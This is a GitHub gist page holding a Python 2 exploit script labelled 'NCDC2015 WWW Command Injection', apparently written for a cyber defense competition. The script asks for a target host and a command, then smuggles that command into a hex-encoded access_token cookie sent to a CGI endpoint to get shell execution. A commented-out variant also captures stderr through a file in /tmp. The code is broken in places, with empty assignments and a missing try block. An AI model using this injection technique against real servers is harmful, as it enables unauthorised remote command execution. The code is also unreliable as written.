Skip to content

Instantly share code, notes, and snippets.



Last active Aug 29, 2015
What would you like to do?
NCDC2015 WWW Command Injection
import sys
import getopt
import urllib2
# define hexEncode function
hexEncode = lambda x:"".join([hex(ord(c))[2:].zfill(2) for c in x])
def main(argv):
# set defaults
target = None
# parse command line options
opts, args = getopt.getopt(argv, "h", ["help", "target="])
except getopt.GetoptError:
for opt, arg in opts:
if opt in ("-h", "--help"):
elif opt in ("--target"):
target = arg
if target is None:
target = raw_input("Enter target (hostname or IP): ")
url = "http://" + target + "/cgi-bin/show/landing"
command = raw_input("Enter command to inject: ")
encodedCommand = hexEncode("' .; " + command + ";'")
# uncomment the hacky line below if you want stderr output in the response
#encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
response =
content =
print "-----------------------------------------------------"
print "GET " + url
print "Cookie: access_token=" + encodedCommand
print "-----------------------------------------------------"
print content
def usage():
print "Usage: [options] ..."
print "Configuration:"
print " --target=<hostname or IP> Sets the target host."
print "Miscellaneous:"
print " -h Print usage options."
print "\n"
if __name__ == "__main__":
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment